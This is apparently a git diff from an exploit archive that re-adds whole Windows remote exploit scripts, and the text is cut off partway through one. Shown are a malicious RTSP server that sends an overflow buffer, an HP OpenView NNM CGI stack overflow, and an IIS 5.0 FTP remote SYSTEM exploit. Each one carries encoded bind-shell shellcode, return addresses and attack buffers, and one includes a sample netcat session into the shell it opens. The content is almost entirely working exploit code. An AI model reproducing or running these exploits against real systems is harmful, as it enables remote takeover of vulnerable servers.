+"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e" +"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39" +"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b" +"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e" +"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38" +"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31" +"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46" +"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30" +"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73" +"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e" +"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32" +"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30" +"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e" +"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58" +"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41" +"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b" +"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b" +"\x4f\x48\x56\x69\x6f\x6a\x70\x42") + +tmp = "A" * 987 +tmp +="\xeb\x20\x90\x90" # short jump for 7.2 +tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3 +tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3 +tmp += "\x90" * 92 +tmp += shellcode +tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions. + +header %= (tmp, len(body)) +evil = header + body + +s = socket(AF_INET, SOCK_STREAM) +s.bind(("0.0.0.0", 554)) +s.listen(1) +print "[+] Listening on [RTSP] 554" +c, addr = s.accept() +print "[+] Connection accepted from: %s" % (addr[0]) +c.recv(1024) +c.send(evil) +raw_input("[+] Done, press enter to quit") +c.close() +s.close() + +# milw0rm.com [2007-11-26] diff --git a/platforms/windows/remote/4724.py b/platforms/windows/remote/4724.py index c394781ea..dbaa69b31 100755 --- a/platforms/windows/remote/4724.py +++ b/platforms/windows/remote/4724.py @@ -1,89 +1,89 @@ -#!/usr/bin/python -# HP OpenView Network Node Manager CGI Buffer Overflow -# Tested on NNM Release B.07.50 / Windows 2000 server SP4 -# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html -# Coded by Mati Aharoni -# muts|offensive-security|com -# http://www.offensive-security.com/0day/hpnnm.txt -# Notes: -# Vanilla stack based overflow -# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking -# the entry point and injecting Sleep just before exe execution. This gave me enough -# time to attach a debugger before program termination. If anyone knows how to properly -# debug this, please tell me about it - there *must* be a better way... -# -# bt tools # ./sploit 192.168.1.105 -# [+] Connecting to 192.168.1.105 -# [+] Sending Evil Buffer to NNM CGI -# [+] Payload Sent, ph33r. -# -# bt tools # nc -nv 192.168.1.105 4444 -# (UNKNOWN) [192.168.1.105] 4444 (krb524) open -# Microsoft Windows 2000 [Version 5.00.2195] -# (C) Copyright 1985-2000 Microsoft Corp. -# -# C:\Program Files\HP OpenView\www\cgi-bin> - -import socket -import os -import sys -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -print "[+] Connecting to "+sys.argv[1] -expl.connect ( ( sys.argv[1], 80 ) ) -print "[+] Sending Evil Buffer to NNM CGI\n" -buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" -buffer+="A"*5123 -buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4 -buffer+="\x90"*32 -# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ -buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68" -"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42" -"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50" -"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71" -"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c" -"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64" -"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55" -"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e" -"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a" -"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78" -"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54" -"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76" -"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50" -"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64" -"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63" -"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b" -"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70" -"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a" -"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c" -"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73" -"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c" -"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51" -"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62" -"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75" -"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51" -"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c" -"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b" -"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79" -"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f" -"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58" -"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33" -"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44" -"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54" -"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30" -"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c" -"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51" -"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33" -"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48" -"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a" -"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73" -"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b" -"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b" -"\x4f\x6b\x66\x79\x6f\x58\x50\x68") -buffer+="\r\n\r\n" - -expl.send (buffer) -expl.close() -print "[+] Payload Sent, ph33r." - -# milw0rm.com [2007-12-12] +#!/usr/bin/python +# HP OpenView Network Node Manager CGI Buffer Overflow +# Tested on NNM Release B.07.50 / Windows 2000 server SP4 +# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html +# Coded by Mati Aharoni +# muts|offensive-security|com +# http://www.offensive-security.com/0day/hpnnm.txt +# Notes: +# Vanilla stack based overflow +# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking +# the entry point and injecting Sleep just before exe execution. This gave me enough +# time to attach a debugger before program termination. If anyone knows how to properly +# debug this, please tell me about it - there *must* be a better way... +# +# bt tools # ./sploit 192.168.1.105 +# [+] Connecting to 192.168.1.105 +# [+] Sending Evil Buffer to NNM CGI +# [+] Payload Sent, ph33r. +# +# bt tools # nc -nv 192.168.1.105 4444 +# (UNKNOWN) [192.168.1.105] 4444 (krb524) open +# Microsoft Windows 2000 [Version 5.00.2195] +# (C) Copyright 1985-2000 Microsoft Corp. +# +# C:\Program Files\HP OpenView\www\cgi-bin> + +import socket +import os +import sys +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +print "[+] Connecting to "+sys.argv[1] +expl.connect ( ( sys.argv[1], 80 ) ) +print "[+] Sending Evil Buffer to NNM CGI\n" +buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" +buffer+="A"*5123 +buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4 +buffer+="\x90"*32 +# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ +buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68" +"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42" +"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50" +"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71" +"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c" +"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64" +"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55" +"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e" +"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a" +"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78" +"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54" +"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76" +"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50" +"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64" +"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63" +"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b" +"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70" +"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a" +"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c" +"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73" +"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c" +"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51" +"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62" +"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75" +"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51" +"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c" +"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b" +"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79" +"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f" +"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58" +"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33" +"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44" +"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54" +"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30" +"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c" +"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51" +"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33" +"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48" +"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a" +"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73" +"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b" +"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b" +"\x4f\x6b\x66\x79\x6f\x58\x50\x68") +buffer+="\r\n\r\n" + +expl.send (buffer) +expl.close() +print "[+] Payload Sent, ph33r." + +# milw0rm.com [2007-12-12] diff --git a/platforms/windows/remote/663.py b/platforms/windows/remote/663.py index 06460d72e..ab32052ca 100755 --- a/platforms/windows/remote/663.py +++ b/platforms/windows/remote/663.py @@ -42,6 +42,6 @@ sleep(3) s.send('A001 SELECT ' + buffer+'\r\n') data = s.recv(1024) s.close() -print "\nDone! " - -# milw0rm.com [2004-11-29] +print "\nDone! " + +# milw0rm.com [2004-11-29] diff --git a/platforms/windows/remote/7410.htm b/platforms/windows/remote/7410.htm index 1ea23e76e..010c522b1 100755 --- a/platforms/windows/remote/7410.htm +++ b/platforms/windows/remote/7410.htm @@ -1,55 +1,55 @@ - - - - - - - - - -# milw0rm.com [2008-12-10] + + + + + + + + + +# milw0rm.com [2008-12-10] diff --git a/platforms/windows/remote/9559.pl b/platforms/windows/remote/9559.pl index ceacfdc4f..47c87ad56 100755 --- a/platforms/windows/remote/9559.pl +++ b/platforms/windows/remote/9559.pl @@ -1,144 +1,144 @@ -#!/usr/bin/perl -# IIS 5.0 FTP Server / Remote SYSTEM exploit -# Win2k SP4 targets -# bug found & exploited by Kingcope, kcope2googlemail.com -# Affects IIS6 with stack cookie protection -# Modded by muts, additional egghunter added for secondary larger payload -# Might take a minute or two for the egg to be found. -# Opens bind shell on port 4444 - -# http://www.offensive-security.com/0day/msftp.pl.txt - -use IO::Socket; -$|=1; -$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" . -"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" . -"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" . -"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" . -"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" . -"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" . -"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" . -"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" . -"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41"; -# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d" - -$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" . -"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" . -"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" . -"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" . -"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" . -"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" . -"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" . -"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" . -"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" . -"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" . -"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" . -"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" . -"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" . -"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" . -"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" . -"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" . -"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" . -"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" . -"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" . -"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" . -"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" . -"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" . -"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" . -"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" . -"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90"; - - -print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; -if ($#ARGV ne 1) { -print "usage: iiz5.pl \n"; -exit(0); -} -srand(time()); -$port = int(rand(31337-1022)) + 1025; -$locip = $ARGV[1]; -$locip =~ s/\./,/gi; -if (fork()) { -$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], - PeerPort => '21', - Proto => 'tcp'); -$patch = "\x7E\xF1\xFA\x7F"; -$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms - -$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); -# top address of stack frame where shellcode resides, is hardcoded inside this block -$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" - ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; - -# attack buffer -$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. - ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. - "HHHHIIII". -$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; -$x = <$sock>; -print $x; -print $sock "USER anonimoos\r\n"; -$x = <$sock>; -print $x; -print $sock "PASS $shell\r\n"; -$x = <$sock>; -print $x; -print $sock "USER anonimoos\r\n"; -$x = <$sock>; -print $x; -print $sock "PASS $shell\r\n"; -$x = <$sock>; -print $x; - -print $sock "USER anonymous\r\n"; -$x = <$sock>; -print $x; -print $sock "PASS anonymous\r\n"; -$x = <$sock>; -print $x; -print $sock "MKD w00t$port\r\n"; -$x = <$sock>; -print $x; -print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) -$x = <$sock>; -print $x; -print $sock "SITE $v\r\n"; -$x = <$sock>; -print $x; -print $sock "SITE $v\r\n"; -$x = <$sock>; -print $x; -print $sock "SITE $v\r\n"; -$x = <$sock>; -print $x; -print $sock "SITE $v\r\n"; -$x = <$sock>; -print $x; -print $sock "CWD w00t$port\r\n"; -$x = <$sock>; -print $x; -print $sock "MKD CCC". "$c\r\n"; -$x = <$sock>; -print $x; -print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; -$x = <$sock>; -print $x; -# TRIGGER -print $sock "NLST $c*/../C*/\r\n"; -$x = <$sock>; -print $x; -while (1) {} -} else { -my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); -die "Could not create socket: $!\n" unless $servsock; -my $new_sock = $servsock->accept(); -while(<$new_sock>) { -print $_; -} -close($servsock); -} -#Cheerio, -# -#Kingcope - -# milw0rm.com [2009-09-01] +#!/usr/bin/perl +# IIS 5.0 FTP Server / Remote SYSTEM exploit +# Win2k SP4 targets +# bug found & exploited by Kingcope, kcope2googlemail.com +# Affects IIS6 with stack cookie protection +# Modded by muts, additional egghunter added for secondary larger payload +# Might take a minute or two for the egg to be found. +# Opens bind shell on port 4444 + +# http://www.offensive-security.com/0day/msftp.pl.txt + +use IO::Socket; +$|=1; +$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" . +"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" . +"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" . +"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" . +"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" . +"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" . +"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" . +"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" . +"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41"; +# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d" + +$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" . +"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" . +"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" . +"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" . +"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" . +"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" . +"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" . +"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" . +"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" . +"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" . +"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" . +"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" . +"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" . +"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" . +"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" . +"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" . +"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" . +"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" . +"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" . +"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" . +"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" . +"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" . +"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" . +"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" . +"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90"; + + +print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; +if ($#ARGV ne 1) { +print "usage: iiz5.pl \n"; +exit(0); +} +srand(time()); +$port = int(rand(31337-1022)) + 1025; +$locip = $ARGV[1]; +$locip =~ s/\./,/gi; +if (fork()) { +$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], + PeerPort => '21', + Proto => 'tcp'); +$patch = "\x7E\xF1\xFA\x7F"; +$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms + +$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); +# top address of stack frame where shellcode resides, is hardcoded inside this block +$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" + ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; + +# attack buffer +$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. + ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. + "HHHHIIII". +$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; +$x = <$sock>; +print $x; +print $sock "USER anonimoos\r\n"; +$x = <$sock>; +print $x; +print $sock "PASS $shell\r\n"; +$x = <$sock>; +print $x; +print $sock "USER anonimoos\r\n"; +$x = <$sock>; +print $x; +print $sock "PASS $shell\r\n"; +$x = <$sock>; +print $x; + +print $sock "USER anonymous\r\n"; +$x = <$sock>; +print $x; +print $sock "PASS anonymous\r\n"; +$x = <$sock>; +print $x; +print $sock "MKD w00t$port\r\n"; +$x = <$sock>; +print $x; +print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) +$x = <$sock>; +print $x; +print $sock "SITE 